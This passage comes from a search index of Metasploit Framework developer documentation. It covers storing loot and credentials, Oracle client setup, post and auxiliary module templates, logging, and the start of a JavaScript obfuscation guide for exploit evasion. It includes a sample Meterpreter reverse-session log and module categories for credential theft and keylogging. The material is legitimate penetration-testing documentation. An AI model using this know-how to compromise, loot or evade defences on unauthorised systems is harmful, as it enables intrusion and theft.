    "title": "Reporting and Storing Data",
    "content": ". | store_loot() - Used to store both stolen files (both text and binary) and “screencaps” of commands such as a ps -ef and ifconfig. The file itself need not be of forensic-level integrity – they may be parsed by a post module to extract only the relevant information for a penetration tester. | report_auth_info() - Used to store working credentials that are immediately reusable by another module. For example, a module dumping the local SMB hashes would use this, as would a module which reads username:password combinations for a specific host and service. Specifically, merely “likely” usernames and passwords should use store_loot() instead. | report_vuln() - Auxiliary and post modules that exercise a particular vulnerability should report_vuln() upon success. Note that exploit modules automatically report_vuln() as part of opening a session (there is no need to call it especially). | report_note() - Modules should make an effort to avoid report_note() when one of the above methods would be a better fit, but there are often cases where “loot” or “cred” or “vuln” classifications are not immediately appropriate. report_note() calls should always set a OID-style dotted :type, such as domain.hosts, so other modules may easily find them in the database. | report_host() - Reports a host’s liveness and attributes such as operating system and service pack. This is less common because other reporting methods already do this, such as report_service, report_exploit_success, report_client, report_note, report_host_tag, report_vuln, report_event, report_loot, etc. Try not to repeat it. | report_service() - Reports a new service (port) that’s been detected by your module. | report_client() - Reports a client running a host, such as a web browser. | report_web_site() - Reports a website, and must be tied to an existing :service. If there is no :service, you will have to supply :host, :port, :ssl. | report_web_page() - You can use this if your module discovers a webpage that look interesting. | report_web_form() - You can use this if your module discovers web forms that look interesting. | report_web_vuln() - Reports a web application vulnerability. Exploits don’t really need to use this. It’s more suitable for auxiliary modules that exploit a bug that determines that it is vulnerable. | report_loot() - Very rarely, modules might actually want to export loots without using store_loot(). Typically they do this with Ruby’s file IO, but this won’t be logged in the database so can’t be tracked by Metasploit Framework. In that case, a report_loot() is needed. However, 99.9% of the time you should be using store_loot(). | . References . | Guidelines for Accepting Modules and Enhancements | https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/auxiliary/report.rb | . ",
    "url": "/docs/development/developing-modules/libraries/how-to-do-reporting-or-store-data-in-module-development.html",
    "relUrl": "/docs/development/developing-modules/libraries/how-to-do-reporting-or-store-data-in-module-development.html"
  },"243": {
    "doc": "How to get Oracle Support working with Kali Linux",
    "title": "Install the Oracle Instant Client",
    "content": "As root, create the directory /opt/oracle. Then download the Oracle Instant Client packages for your version of Kali Linux. The packages you will need are: . | instantclient-basic-linux-12.2.0.1.0.zip | instantclient-sqlplus-linux-12.2.0.1.0.zip | instantclient-sdk-linux-12.2.0.1.0.zip | . Unzip these under /opt/oracle, and you should now have a path called /opt/oracle/instantclient_12_2/. Next symlink the shared library that we need to access the library from oracle: . root@kali:/opt/oracle/instantclient_12_2# ln libclntsh.so.12.1 libclntsh.so root@kali:/opt/oracle/instantclient_12_2# ls -lh libclntsh.so lrwxrwxrwx 1 root root 17 Jun 1 15:41 libclntsh.so -&amp;gt; libclntsh.so.12.1 . You also need to configure the appropriate environment variables, perhaps by inserting them into your .bashrc file, logging out and back in for them to apply. export PATH=$PATH:/opt/oracle/instantclient_12_2 export SQLPATH=/opt/oracle/instantclient_12_2 export TNS_ADMIN=/opt/oracle/instantclient_12_2 export LD_LIBRARY_PATH=/opt/oracle/instantclient_12_2 export ORACLE_HOME=/opt/oracle/instantclient_12_2 . If you have succeeded, you should be able to run sqlplus from a command prompt: . root@kali:/opt/oracle/instantclient_12_2# sqlplus SQL*Plus: Release 12.2.0.1.0 Production on Tue Mar 26 20:40:24 2019 Copyright (c) 1982, 2016, Oracle. All rights reserved. Enter user-name: . ",
    "url": "/docs/using-metasploit/other/oracle-support/how-to-get-oracle-support-working-with-kali-linux.html#install-the-oracle-instant-client",
    "relUrl": "/docs/using-metasploit/other/oracle-support/how-to-get-oracle-support-working-with-kali-linux.html#install-the-oracle-instant-client"
  },"244": {
    "doc": "How to get Oracle Support working with Kali Linux",
    "title": "Install the ruby gem",
    "content": "First, download and extract the gem source release: . root@kali:~# wget https://github.com/kubo/ruby-oci8/archive/ruby-oci8-2.2.7.zip --2019-03-26 20:31:11-- https://github.com/kubo/ruby-oci8/archive/ruby-oci8-2.2.7.zip Resolving github.com (github.com)... 192.30.253.113, 192.30.253.112 Connecting to github.com (github.com)|192.30.253.113|:443... connected. HTTP request sent, awaiting response... 302 Found Location: https://codeload.github.com/kubo/ruby-oci8/zip/ruby-oci8-2.2.7 [following] --2019-03-26 20:31:11-- https://codeload.github.com/kubo/ruby-oci8/zip/ruby-oci8-2.2.7 Resolving codeload.github.com (codeload.github.com)... 192.30.253.120, 192.30.253.121 Connecting to codeload.github.com (codeload.github.com)|192.30.253.120|:443... connected. HTTP request sent, awaiting response... 200 OK Length: unspecified [application/zip] Saving to: 'ruby-oci8-2.2.7.zip' ruby-oci8-2.2.7.zip [ &amp;lt;=&amp;gt; ] 376.97K 2.36MB/s in 0.2s 2019-03-26 20:31:11 (2.36 MB/s) - 'ruby-oci8-2.2.7.zip' saved [386016] root@kali:~# unzip ruby-oci8-2.2.7.zip Archive: ruby-oci8-2.2.7.zip 0c85bf6da2f541de3236267b1a1b18f0136a8f5a creating: ruby-oci8-ruby-oci8-2.2.7/ inflating: ruby-oci8-ruby-oci8-2.2.7/.gitignore inflating: ruby-oci8-ruby-oci8-2.2.7/.travis.yml [...] inflating: ruby-oci8-ruby-oci8-2.2.7/test/test_rowid.rb root@kali:~# cd ruby-oci8-ruby-oci8-2.2.7/ . Install libgmp (needed to build the gem) and set the path to prefer the correct version of ruby so that Metasploit can use it. root@kali:~/ruby-oci8-ruby-oci8-2.2.7# export PATH=/opt/metasploit/ruby/bin:$PATH root@kali:~/ruby-oci8-ruby-oci8-2.2.7# apt-get install libgmp-dev Reading package lists... Done Building dependency tree Reading state information... Done Suggested packages: libgmp10-doc libmpfr-dev The following NEW packages will be installed: libgmp-dev 0 upgraded, 1 newly installed, 0 to remove and 0 not upgraded. Need to get 0 B/610 kB of archives. After this operation, 1,740 kB of additional disk space will be used. Selecting previously unselected package libgmp-dev:amd64. (Reading database ... 322643 files and directories currently installed.) Unpacking libgmp-dev:amd64 (from .../libgmp-dev_2%3a5.0.5+dfsg-2_amd64.deb) ... Setting up libgmp-dev:amd64 (2:5.0.5+dfsg-2) ... Build and install the gem . root@kali:~/ruby-oci8-ruby-oci8-2.2.7# make ruby -w setup.rb config setup.rb:280: warning: assigned but unused variable - vname setup.rb:280: warning: assigned but unused variable - desc setup.rb:280: warning: assigned but unused variable - default2 ---&amp;gt; lib ---&amp;gt; lib/dbd &amp;lt;--- lib/dbd ---&amp;gt; lib/oci8 &amp;lt;--- lib/oci8 &amp;lt;--- lib ---&amp;gt; ext ---&amp;gt; ext/oci8 /opt/metasploit/ruby/bin/ruby /root/ruby-oci8-ruby-oci8-2.2.7/ext/oci8/extconf.rb checking for load library path... LD_LIBRARY_PATH... checking /opt/metasploit/ruby/lib... no checking /opt/oracle/instantclient_12_2... yes /opt/oracle/instantclient_12_2/libclntsh.so.12.1 looks like an instant client. checking for cc... ok checking for gcc... yes checking for LP64... yes checking for sys/types.h... yes checking for ruby header... ok checking for OCIInitialize() in oci.h... yes [...] linking shared-object oci8lib_250.so make[1]: Leaving directory `/root/ruby-oci8-ruby-oci8-2.2.7/ext/oci8' &amp;lt;--- ext/oci8 &amp;lt;--- ext root@kali:~/ruby-oci8-ruby-oci8-2.2.7# make install ruby -w setup.rb install setup.rb:280: warning: assigned but unused variable - vname setup.rb:280: warning: assigned but unused variable - desc setup.rb:280: warning: assigned but unused variable - default2 ---&amp;gt; lib mkdir -p /opt/metasploit/ruby/lib/ruby/site_ruby/2.5.0/ install oci8.rb /opt/metasploit/ruby/lib/ruby/site_ruby/2.5.0/ [...] &amp;lt;--- ext root@kali:~/ruby-oci8-ruby-oci8-2.2.7# . ",
    "url": "/docs/using-metasploit/other/oracle-support/how-to-get-oracle-support-working-with-kali-linux.html#install-the-ruby-gem",
    "relUrl": "/docs/using-metasploit/other/oracle-support/how-to-get-oracle-support-working-with-kali-linux.html#install-the-ruby-gem"
  },"245": {
    "doc": "How to get Oracle Support working with Kali Linux",
    "title": "How to get Oracle Support working with Kali Linux",
    "content": "This is an update of the original blog post about how to get Oracle support working with Metasploit and Kali Linux, found here. Due to licensing issues, we cannot ship Oracle’s proprietary client access libraries by default. As a result, you may see this error when running a Metasploit module: . msf auxiliary(oracle_login) &amp;gt; run [-] Failed to load the OCI library: cannot load such file -- oci8 [-] See http://www.metasploit.com/redmine/projects/framework/wiki/OracleUsage for installation instructions [*] Auxiliary module execution completed msf auxiliary(oracle_login) &amp;gt; run . or . msf5 auxiliary(scanner/oracle/oracle_hashdump) &amp;gt; run [-] Failed to load the OCI library: cannot load such file -- oci8 [-] Try 'gem install ruby-oci8' [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed . The general steps to getting Oracle support working are to install the Oracle Instant Client and development libraries, install the required dependencies for Kali Linux, then install the gem. ",
    "url": "/docs/using-metasploit/other/oracle-support/how-to-get-oracle-support-working-with-kali-linux.html",
    "relUrl": "/docs/using-metasploit/other/oracle-support/how-to-get-oracle-support-working-with-kali-linux.html"
  },"246": {
    "doc": "How to get started with writing a Meterpreter script",
    "title": "How to get started with writing a Meterpreter script",
    "content": ". I tricked you. We don’t let anybody write Meterpreter scripts anymore, therefore we will no longer teach you how. You should try writing post modules instead. ",
    "url": "/docs/using-metasploit/advanced/meterpreter/how-to-get-started-with-writing-a-meterpreter-script.html",
    "relUrl": "/docs/using-metasploit/advanced/meterpreter/how-to-get-started-with-writing-a-meterpreter-script.html"
  },"247": {
    "doc": "Writing a post module",
    "title": "Plan your module",
    "content": "Just like writing a software, before you start coding you should have a clear and specific goal for what your post module does. It’s never a good idea to have multiple functionalities in a single module. For example: having it steal the network configuration files, steal passwd, hashes, shell history, etc. Instead, you should break it down into multiple modules. You should also think about what session types to support: meterpreter, or shell. Ideally, support both. But if you have to choose between the two, on Windows you should favor Windows Meterpreter. On Linux, the shell session type has been a stronger candidate than the Linux Meterpreter, but hopefully this will change in the near future. For platforms that don’t have a Meterpreter, obviously your only choice is a shell. Another important thing is to think about how your module will perform on different distributions/systems. For example, say you want to run a ifconfig command on Linux. On Ubuntu it’s a no-brainer, simply run the ifconfig command. Well, a different Linux distro might not actually know what you’re asking, so you have to be more specific and do /sbin/ifconfig instead. Same thing with Windows. Is it C:\\WINDOWS\\ or C:\\WinNT? It’s both. Is it C:\\Documents and Settings\\[User name], or C:\\Users\\[User name]? Both, depends on that Windows version. A better solution to that would be use an environment variable :-) . Always do your homework, and contain as many scenarios you can think of. And most importantly, get your VMs and TEST! . Categories of post modules . Post modules are categorized based on their behavior. For example, if it collects data, naturally it goes to the “gather” category. If it adds/updates/or removes an user, it belongs to “manage”. Here’s a list as a reference: . | Category | Description | . | gather | Modules that involve data gathering/collecting/enumeration. | . | gather/credentials | Modules that steal credentials. | . | gather/forensics | Modules that involve forensics data gathering. | . | manage | Modules that modifies/operates/manipulates something on the system. Session management related tasks such as migration, injection also go here. | . | recon | Modules that will help you learn more about the system in terms of reconnaissance, but not about data stealing. Understand this is not the same as “gather” type modules. | . | wlan | Modules that are for WLAN related tasks. | . | escalate | This is deprecated, but the modules remain there due to popularity. This used to be the place for privilege escalation modules. All privilege escalation modules are no longer considered as post modules, they’re now exploits. | . | capture | Modules that involve monitoring something for data collection. For example: key logging. | . Session object . So you know how in Lord of the Rings, people are totally obsessed with the One Ring? Well, that’s how it is with the session object. The one object you cannot live without, it’s your precious. All post modules and other related mixins basically are built on top of the session object, because it knows everything about the compromised host, and allows you to command it. You can use the session method to access the session object, or its alias client. The best way to interact with one is via irb, here’s an example of how: . msf exploit(handler) &amp;gt; run [*] Started reverse handler on 192.168.1.64:4444 [*] Starting the payload handler... [*] Sending stage (769536 bytes) to 192.168.1.106 [*] Meterpreter session 1 opened (192.168.1.64:4444 -&amp;gt; 192.168.1.106:55157) at 2014-07-31 17:59:36 -0500 meterpreter &amp;gt; irb [*] Starting IRB shell [*] The 'client' variable holds the meterpreter client &amp;gt;&amp;gt; session.class =&amp;gt; Msf::Sessions::Meterpreter_x86_Win . At this point you have the power to rule them all. But notice that the above example is a Msf::Sessions::Meterpreter_x86_Win object. There are actually several more different ones: command_shell.rb, meterpreter_php.rb, meterpreter_java.rb, meterpreter_x86_linux.rb, etc. Each behaves differently so it’s actually kind of difficult to explain them all, but they are defined in the lib/msf/base/sessions/ directory so you can see how they work. Or you can play with one since you’re already in the irb prompt. In Ruby, there are two object methods that are handy for debugging purposes. The first is methods, which will list all the public and protected methods from that object: . session.methods . The other one is inspect, which returns a string of a human-readable representation of the object: . session.inspect . One commonly used method of the session object is the platform method. For example, if you’re writing a post module for a windows exploit, in the check method you’ll likely want to use session.platform to ensure the target session is affected: . unless session.platform == 'windows' # Non-Windows systems are definitely not affected. return Exploit::CheckCode::Safe end . You can also look at other current post modules and see how they use their session object. The Msf::Post Mixin . As we explained, most post module mixins are built on top of the session object, and there are many out there. However, there is a main one you obviously cannot live without: the Msf::Post mixin. When you create a post module with this mixin, a lot of other mixins are also already included for all kinds of scenarios, to be more specific: . | msf/core/post/common - Common methods post modules use, for example: cmd_exec. | msf/core/post_mixin - Keeps track of the session state. | msf/core/post/file - File system related methods. | msf/core/post/webrtc - Uses WebRTC to interact with the target machine’s webcam. | msf/core/post/linux - There actually isn’t a lot going on, just get_sysinfo and is_root? specifically for Linux. | msf/core/post/osx - get_sysinfo, get_users, get_system_accounts, get_groups, and methods for operating the target machine’s webcam. | msf/core/post/solaris - Pretty much like the linux mixin. Same methods, but for Solaris. | msf/core/post/unix - get_users, get_groups, enum_user_directories | msf/core/post/windows - Most of the development time are spent here. From Windows account management, event log, file info, Railgun, LDAP, netapi, powershell, registry, wmic, services, etc. | . Template . Here we have a post module template. As you can see, there are some required fields that need to be filled. We’ll explain each: . ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule &amp;lt; Msf::Post def initialize(info = {}) super( update_info( info, 'Name' =&amp;gt; '[Platform] [Module Category] [Software] [Function]', 'Description' =&amp;gt; %q{ Say something that the user might want to know. }, 'License' =&amp;gt; MSF_LICENSE, 'Author' =&amp;gt; [ 'Name' ], 'Platform' =&amp;gt; [ 'win', 'linux', 'osx', 'unix', 'bsd', 'solaris' ], 'SessionTypes' =&amp;gt; [ 'meterpreter', 'shell' ] ) ) end def run # Main method end end . The Name field should begin with a platform, such as: Multi, Windows, Linux, OS X, etc. Followed by the module’s category, such as: Gather, Manage, Recon, Capture, Wlan. Followed by the name of the software, and then finally a few words that describe the functionality of the module. A naming example: “Multi Gather RndFTP Credential Enumeration”. The Description field should explain what the module does, things to watch out for, specific requirements, the more the better. The goal is to let the user understand what he’s using without the need to actually read the module’s source and figure things out. And trust me, most of them don’t. The Author field is where you put your name. The format should be “Name \". If you want to have your Twitter handle there, leave it as a comment, for example: \"Name # handle\" . The Platform field indicates what platforms are supported, for example: win, linux, osx, unix, bsd. The SessionTypes field should be either meterpreter, or shell. You should try to support both. And finally, the run method is like your main method. Start writing your code there. Basic git commands . Metasploit no longer uses svn for source code management, instead we use git, so knowing some tricks with git go a long way. We’re not here to lecture you about how awesome git is, we know it has a learning curve and it’s not surprising to find new users making mistakes. Every once a while, your git “rage” will kick in, and we understand. However, it’s important for you to take advantage of branching. Every time you make a module, or make some changes to existing code, you should not do so on the default master branch. Why? Because when you do a msfupdate, which is Metasploit’s utility for updating your repository, it will do a git reset before merging the changes, and all your code go bye-bye. Another mistake people tend to do is have all the changes on master before submitting a pull request. This is a bad idea, because most likely you’re submitting other crap you don’t intend to change, and/or you’re probably asking us to merge other unnecessary commit history when there only needs to be one commit. Thanks for contributing your module to the community, but no thanks to your crazy commit history. So as a habit, when you want to make something new, or change something, begin with a new branch that’s up to date to master. First off, make sure you’re on master. If you do a git status it will tell you what branch you’re currently on: . $ git status # On branch upstream-master nothing to commit, working directory clean . Ok, now do a git pull to download the latest changes from Metasploit: . $ git pull Already up-to-date. At this point, you’re ready to start a new branch. In this case, we’ll name our new branch “my_awesome_branch”: . $ git checkout -b my_awesome_module Switched to a new branch 'my_awesome_module' . And then you can go ahead and add that module. Make sure it’s in the appropriate path: . $ git add [module path] . When you decide to save the changes, commit (if there’s only one module, you can do git commit -a too so you don’t have to type the module path. Note -a really means EVERYTHING): . $ git commit [module path] . When you’re done, push your changes, which will upload your code to your remote branch “my_awesome_branch”. You must push your changes in order to submit the pull request, or share it with others on the Internet. $ git push origin my_awesome_branch . References . | https://github.com/rapid7/metasploit-framework/tree/master/modules/post | https://github.com/rapid7/metasploit-framework/tree/master/lib/msf/core/post | . ",
    "url": "/docs/development/developing-modules/guides/how-to-get-started-with-writing-a-post-module.html#plan-your-module",
    "relUrl": "/docs/development/developing-modules/guides/how-to-get-started-with-writing-a-post-module.html#plan-your-module"
  },"248": {
    "doc": "Writing a post module",
    "title": "Writing a post module",
    "content": "Post module development is a challenge to your programming skills. It’s not like writing a memory corruption based exploit, where technically speaking is usually about crafting a malicious input - a string. A post module is more about proper module design, practical knowledge in Ruby and the Metasploit library. It’s also a very valuable skill to have, because if you don’t know what to do after popping a shell, what’s the point of the penetration test, right? Also, what if a module doesn’t work? Are you willing to wait days, weeks, or maybe even months for someone else to fix it for you? Probably not. If you know how to do it yourself, you can probably fix it a lot sooner, and continue with your pentest and do more things. So learn post module development! It’s good for you, and your career. ",
    "url": "/docs/development/developing-modules/guides/how-to-get-started-with-writing-a-post-module.html",
    "relUrl": "/docs/development/developing-modules/guides/how-to-get-started-with-writing-a-post-module.html"
  },"249": {
    "doc": "Writing an auxiliary module",
    "title": "Plan your module",
    "content": "Just like writing a software, before you start coding you should have a clear and specific goal for what your auxiliary module does. It’s never a good idea to have multiple functionalities in a single module. You should break it down into multiple modules instead. You should also think about how your module will perform in different situations. For example, if it’s meant to test against a Tomcat server, what happens if you use it against Nginx? Will it error out and leave a backtrace? If it does, you should handle that properly. Does your module require specific settings/conditions from the target machine? What happens if it doesn’t? Will it error out again? . Most importantly, make sure to test your module thoroughly. It’s always ugly to find out problems in the middle of an important engagement, that just might cost you. ",
    "url": "/docs/development/developing-modules/guides/how-to-get-started-with-writing-an-auxiliary-module.html#plan-your-module",
    "relUrl": "/docs/development/developing-modules/guides/how-to-get-started-with-writing-an-auxiliary-module.html#plan-your-module"
  },"250": {
    "doc": "Writing an auxiliary module",
    "title": "Main categories of auxiliary modules",
    "content": "Generally speaking, auxiliary modules are categorized based on their behavior, but this is somewhat inconsistent so you’ll just have to use your best judgement and find the most appropriate one. Here’s a list of the common ones: . | Category | Description | . | admin | Modules that modify, operate, or manipulate something on target machine. | . | analyze | We initially created this folder for password-cracking modules that require analysis time. | . | client | We initially created this folder for an SMTP module for social-engineering purposes. | . | dos | Pretty self-explanatory: denial-of-service modules. | . | fuzzers | If your module is a fuzzer, this is where it belongs. Make sure to place it in the correct sub-directory based on the protocol. | . | gather | Modules that gather, collect, or enumerates data from a single target. | . | scanner | Modules that use the Msf::Auxiliary::Scanner mixin almost always go here. Make sure to place yours in the correct sub-directory based on the protocol. | . | server | Modules that are servers. | . | sniffer | Modules that are sniffers. | . There are actually a few more directories in auxiliary, but that’s kind of where the gray area is. You are more than welcome to see if yourself. ",
    "url": "/docs/development/developing-modules/guides/how-to-get-started-with-writing-an-auxiliary-module.html#main-categories-of-auxiliary-modules",
    "relUrl": "/docs/development/developing-modules/guides/how-to-get-started-with-writing-an-auxiliary-module.html#main-categories-of-auxiliary-modules"
  },"251": {
    "doc": "Writing an auxiliary module",
    "title": "The Msf::Auxiliary::Scanner mixin",
    "content": "The Msf::Auxiliary::Scanner mixin is heavily used in auxiliary modules, so we might as well talk about it right here. The mixin allows you to be able to test against a range of hosts, and it’s multi-threaded. To use it, first off you need to include the mixin under the scope of your Metasploit3 class: . include Msf::Auxiliary::Scanner . A couple of new things will be added to your module when you include this mixin. You will have a new datastore option named “RHOSTS”, which allows the user to specify multiple hosts. There’s a new “THREADS” option, which allows the number of threads to run during execution. There’s also “ShowProgress” and “ShowProgressPercent” for tracking scan progress. Typically, the main method for an auxiliary module is “def run”. But when you use the Msf::Auxiliary::Scanenr mixin, you need to be using def run_host(ip). The IP parameter is the target machine. ",
    "url": "/docs/development/developing-modules/guides/how-to-get-started-with-writing-an-auxiliary-module.html#the-msfauxiliaryscanner-mixin",
    "relUrl": "/docs/development/developing-modules/guides/how-to-get-started-with-writing-an-auxiliary-module.html#the-msfauxiliaryscanner-mixin"
  },"252": {
    "doc": "Writing an auxiliary module",
    "title": "Templates",
    "content": "Here’s the most basic example of an auxiliary module. We’ll explain a bit more about the fields that need to be filled: . ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule &amp;lt; Msf::Auxiliary def initialize(info = {}) super( update_info( info, 'Name' =&amp;gt; 'Module name', 'Description' =&amp;gt; %q{ Say something that the user might want to know. }, 'Author' =&amp;gt; [ 'Name' ], 'License' =&amp;gt; MSF_LICENSE ) ) end def run # Main function end end . The Name field can begin with the vendor name, but optional. Followed by the software name. And then a few words that basically describe what it’s for. For example: “Dolibarr ERP/CRM Login Utility” . The Description field should explain what the module does, things to watch out for, specific requirements, the more the better. The goal is to let the user understand what he’s using without the need to actually read the module’s source and figure things out. And trust me, most of them don’t. The Author field is where you put your name. The format should be “Name “. If you want to have your Twitter handle there, leave it as a comment, for example: “Name # handle” . Because the Msf::Auxiliary::Scanner mixin is so popular, we figured you want a template for it, too. And here you go: . ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule &amp;lt; Msf::Auxiliary include Msf::Auxiliary::Scanner def initialize(info = {}) super( update_info( info, 'Name' =&amp;gt; 'Module name', 'Description' =&amp;gt; %q{ Say something that the user might want to know. }, 'Author' =&amp;gt; [ 'Name' ], 'License' =&amp;gt; MSF_LICENSE ) ) end def run_host(ip) # Main method end end . Basic git commands . Metasploit no longer uses svn for source code management, instead we use git, so knowing some tricks with git go a long way. We’re not here to lecture you about how awesome git is, we know it has a learning curve and it’s not surprising to find new users making mistakes. Every once a while, your git “rage” will kick in, and we understand. However, it’s important for you to take advantage of branching. Every time you make a module, or make some changes to existing code, you should not do so on the default master branch. Why? Because when you do a msfupdate, which is Metasploit’s utility for updating your repository, it will do a git reset before merging the changes, and all your code go bye-bye. Another mistake people tend to do is have all the changes on master before submitting a pull request. This is a bad idea, because most likely you’re submitting other crap you don’t intend to change, and/or you’re probably asking us to merge other unnecessary commit history when there only needs to be one commit. Thanks for contributing your module to the community, but no thanks to your crazy commit history. So as a habit, when you want to make something new, or change something, begin with a new branch that’s up to date to master. First off, make sure you’re on master. If you do a git status it will tell you what branch you’re currently on: . $ git status # On branch upstream-master nothing to commit, working directory clean . Ok, now do a git pull to download the latest changes from Metasploit: . $ git pull Already up-to-date. At this point, you’re ready to start a new branch. In this case, we’ll name our new branch “my_awesome_branch”: . $ git checkout -b my_awesome_module Switched to a new branch 'my_awesome_module' . And then you can go ahead and add that module. Make sure it’s in the appropriate path: . $ git add [module path] . When you decide to save the changes, commit (if there’s only one module, you can do git commit -a too so you don’t have to type the module path. Note -a really means EVERYTHING): . $ git commit [module path] . When you’re done, push your changes, which will upload your code to your remote branch “my_awesome_branch”. You must push your changes in order to submit the pull request, or share it with others on the Internet. $ git push origin my_awesome_branch . ",
    "url": "/docs/development/developing-modules/guides/how-to-get-started-with-writing-an-auxiliary-module.html#templates",
    "relUrl": "/docs/development/developing-modules/guides/how-to-get-started-with-writing-an-auxiliary-module.html#templates"
  },"253": {
    "doc": "Writing an auxiliary module",
    "title": "References",
    "content": ". | https://github.com/rapid7/metasploit-framework/tree/master/modules/auxiliary | https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/auxiliary.rb | https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/auxiliary/scanner.rb | . ",
    "url": "/docs/development/developing-modules/guides/how-to-get-started-with-writing-an-auxiliary-module.html#references",
    "relUrl": "/docs/development/developing-modules/guides/how-to-get-started-with-writing-an-auxiliary-module.html#references"
  },"254": {
    "doc": "Writing an auxiliary module",
    "title": "Writing an auxiliary module",
    "content": "Metasploit is known for its free, open-source exploits - modules that pop shells. But in reality, penetration testers rely more on auxiliary modules, and often a successful pentest can be done without firing a single exploit. They’re just more handy, and the punishment for a failed attempt is generally much lower. Professionals actually love auxiliary modules. Another interesting fact about auxiliary modules is that some of them aren’t so different from being exploits. The main difference is how it’s defined in Metasploit: if a module executes a payload, it’s an exploit. If not, even though it takes advantage of a vulnerability, it still belongs to the auxiliary category. If an auxiliary module is capable of running an Operating System command, it could be made into an exploit by delivering a cmd* payload and/or using a command stager. So you see, if you’re an auxiliary module addict, you are on the right track. ",
    "url": "/docs/development/developing-modules/guides/how-to-get-started-with-writing-an-auxiliary-module.html",
    "relUrl": "/docs/development/developing-modules/guides/how-to-get-started-with-writing-an-auxiliary-module.html"
  },"255": {
    "doc": "Logging",
    "title": "Basic Usage",
    "content": "As an user, you should know that all the logged errors are saved in a file named framework.log. The save path is defined in Msf::Config.log_directory, which means in msfconsole, you can switch to irb and figure out where it is: . msf &amp;gt; irb [*] Starting IRB shell... &amp;gt;&amp;gt; Msf::Config.log_directory =&amp;gt; \"/Users/test/.msf4/logs\" . By default, all the log errors are on level 0 - the least informative level. But of course, you can change this by setting the datastore option, like this: . msf &amp;gt; setg LogLevel 3 LogLevel =&amp;gt; 3 msf &amp;gt; . ",
    "url": "/docs/development/developing-modules/libraries/how-to-log-in-metasploit.html#basic-usage",
    "relUrl": "/docs/development/developing-modules/libraries/how-to-log-in-metasploit.html#basic-usage"
  },"256": {
    "doc": "Logging",
    "title": "Log Levels",
    "content": "There are 4 different logging levels defined in log/rex/logging.rb: . | Log Level | Description | . | LEV_0 (Default) | The default log level if none is specified. It should be used when a log message should always be displayed when logging is enabled. Very few log messages should occur at this level aside from necessary information logging and error/warning logging. Debug logging at level zero is not advised. | . | LEV_1 (Extra) | This log level should be used when extra information may be needed to understand the cause of an error or warning message or to get debugging information that might give clues as to why something is happening. This log level should be used only when information may be useful to understanding the behavior of something at a basic level. This log level should not be used in an exhaustively verbose fashion. | . | LEV_2 (Verbose) | This log level should be used when verbose information may be needed to analyze the behavior of the framework. This should be the default log level for all detailed information not falling into LEV_0 or LEV_1. It is recommended that this log level be used by default if you are unsure. | . | LEV_3 (Insanity) | This log level should contain very verbose information about the behavior of the framework, such as detailed information about variable states at certain phases including, but not limited to, loop iterations, function calls, and so on. This log level will rarely be displayed, but when it is the information provided should make it easy to analyze any problem. | . For debugging purposes, it’s always better to turn on the highest level of logging. ",
    "url": "/docs/development/developing-modules/libraries/how-to-log-in-metasploit.html#log-levels",
    "relUrl": "/docs/development/developing-modules/libraries/how-to-log-in-metasploit.html#log-levels"
  },"257": {
    "doc": "Logging",
    "title": "Logging API",
    "content": "There are mainly five logging methods you will most likely be using a lot, and they all have the exact same arguments. Let’s use one of the logging methods to explain what these arguments are about: . def elog(msg, src = 'core', level = 0, from = caller) . | msg - The message you want to log | src - The source of the error (default is core, as in Metasploit core) | level - The log level | from - The current execution stack. caller is a method from Kernel. | . Notice that only the msg argument is required, the rest are optional. Now, let’s go over these five methods and explain how they’re meant to be used: . | Method | Purpose | . | dlog() | LOG_DEBUG | . | elog() | LOG_ERROR | . | wlog() | LOG_WARN | . | ilog() | LOG_INFO | . | rlog() | LOG_RAW | . ",
    "url": "/docs/development/developing-modules/libraries/how-to-log-in-metasploit.html#logging-api",
    "relUrl": "/docs/development/developing-modules/libraries/how-to-log-in-metasploit.html#logging-api"
  },"258": {
    "doc": "Logging",
    "title": "Code Example",
    "content": "elog(\"The sky has fallen\") . ",
    "url": "/docs/development/developing-modules/libraries/how-to-log-in-metasploit.html#code-example",
    "relUrl": "/docs/development/developing-modules/libraries/how-to-log-in-metasploit.html#code-example"
  },"259": {
    "doc": "Logging",
    "title": "Logging",
    "content": "Usually, if something in Metasploit triggers an error, there is a backtrace or at least a brief message that explains what the problem is about. Most of the time, there is nothing wrong with that. But sometimes if you wish to report that problem, you might lose that information, which makes your bug report less informative, and the problem may take much longer to solve. This is why logging to file in many cases is extremely useful. In this documentation, we’ll explain about how to take advantage of this properly. ",
    "url": "/docs/development/developing-modules/libraries/how-to-log-in-metasploit.html",
    "relUrl": "/docs/development/developing-modules/libraries/how-to-log-in-metasploit.html"
  },"260": {
    "doc": "JavaScript Obfuscation",
    "title": "The rand_text_alpha trick",
    "content": "Using rand_text_alpha is the most basic form of evasion, but also the least effective. If this is your choice, you should randomize whatever can be randomized without breaking the code. By using the above MS12-063, here’s how you would use rand_text_alpha: . # Randomizes the array variable # Max size = 6, Min = 3 var_array = rand_text_alpha(rand(6) + 3) # Randomizes the src value val_src = rand_text_alpha(1) js = %Q| var #{var_array} = new Array(); #{var_array}[0] = windows.document.createElement(\"img\"); #{var_array}[0][\"src\"] = \"#{val_src}\"; | . ",
    "url": "/docs/development/developing-modules/libraries/obfuscation/how-to-obfuscate-javascript-in-metasploit.html#the-rand_text_alpha-trick",
    "relUrl": "/docs/development/developing-modules/libraries/obfuscation/how-to-obfuscate-javascript-in-metasploit.html#the-rand_text_alpha-trick"
  },"261": {
    "doc": "JavaScript Obfuscation",
    "title": "The ObfuscateJS class",
